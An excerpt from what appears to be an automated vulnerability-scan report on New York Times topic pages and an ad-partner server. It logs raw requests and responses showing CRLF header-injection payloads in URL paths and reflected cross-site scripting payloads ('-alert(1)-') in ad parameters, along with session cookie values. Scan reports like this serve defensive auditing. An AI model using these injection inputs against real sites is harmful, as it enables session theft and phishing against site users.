GET /top/reference/timestopics/people/105b9%0d%0a853f313a162/madonna/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:41:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/people/105b9 853f313a162/madonna/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.76. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 6]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/people/m/madonna/ |
Issue detail
The value of REST URL parameter 6 is copied into the Location response header. The payload c3f03%0d%0ae6b0f96142d was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/people/m/c3f03%0d%0ae6b0f96142d/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:41:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/people/m/c3f03 e6b0f96142d/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.77. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 919c2%0d%0ada221e78489 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/919c2%0d%0ada221e78489/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:35 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/919c2 da221e78489/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.78. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 22697%0d%0afed4a746118 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/reference/22697%0d%0afed4a746118/subjects/o/oil_spills/gulf_of_mexico_2010/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:35 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/22697 fed4a746118/subjects/o/oil_spills/gulf_of_mexico_2010/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.79. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ |
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 30fc6%0d%0ad1ceed21046 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/30fc6%0d%0ad1ceed21046/o/oil_spills/gulf_of_mexico_2010/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:35 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/30fc6 d1ceed21046/o/oil_spills/gulf_of_mexico_2010/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.80. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 5]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ |
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload ae3e4%0d%0aa980ea2e2c8 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/subjects/ae3e4%0d%0aa980ea2e2c8/oil_spills/gulf_of_mexico_2010/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:35 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/subjects/ae3e4 a980ea2e2c8/oil_spills/gulf_of_mexico_2010/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.81. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 6]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ |
Issue detail
The value of REST URL parameter 6 is copied into the Location response header. The payload 2d948%0d%0a63790b1a5b0 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/subjects/o/2d948%0d%0a63790b1a5b0/gulf_of_mexico_2010/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:35 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/subjects/o/2d948 63790b1a5b0/gulf_of_mexico_2010/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.82. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 7]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ |
Issue detail
The value of REST URL parameter 7 is copied into the Location response header. The payload 4e69e%0d%0a3e883c89cca was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/subjects/o/oil_spills/4e69e%0d%0a3e883c89cca/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:35 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/4e69e 3e883c89cca/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
3. Cross-site scripting (reflected)
previous
next
There are 380 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
3.1. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [ad parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N3282.nytimes.comSD6440/B3948326.5 |
Issue detail
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9b9f'-alert(1)-'8238608c5a5 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5f9b9f'-alert(1)-'8238608c5a5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:50:03 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5f9b9f'-alert(1)-'8238608c5a5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
|
3.2. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [camp parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N3282.nytimes.comSD6440/B3948326.5 |
Issue detail
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 450fc'-alert(1)-'b995b495789 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1450fc'-alert(1)-'b995b495789&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:38 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1450fc'-alert(1)-'b995b495789&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
|
3.3. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [goto parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N3282.nytimes.comSD6440/B3948326.5 |
Issue detail
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2aecd'-alert(1)-'d6c622015b2 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=2aecd'-alert(1)-'d6c622015b2 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:10 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 685
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt ...[SNIP]... age=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=2aecd'-alert(1)-'d6c622015b2http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
|
3.4. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N3282.nytimes.comSD6440/B3948326.5 |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af617'-alert(1)-'531d756a960 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=&af617'-alert(1)-'531d756a960=1 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 688
document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/126/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt ...[SNIP]... ge=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=&af617'-alert(1)-'531d756a960=1http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19"> ...[SNIP]...
|
3.5. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [opzn&page parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N3282.nytimes.comSD6440/B3948326.5 |
Issue detail
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d5c6'-alert(1)-'c0cdb14aea7 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
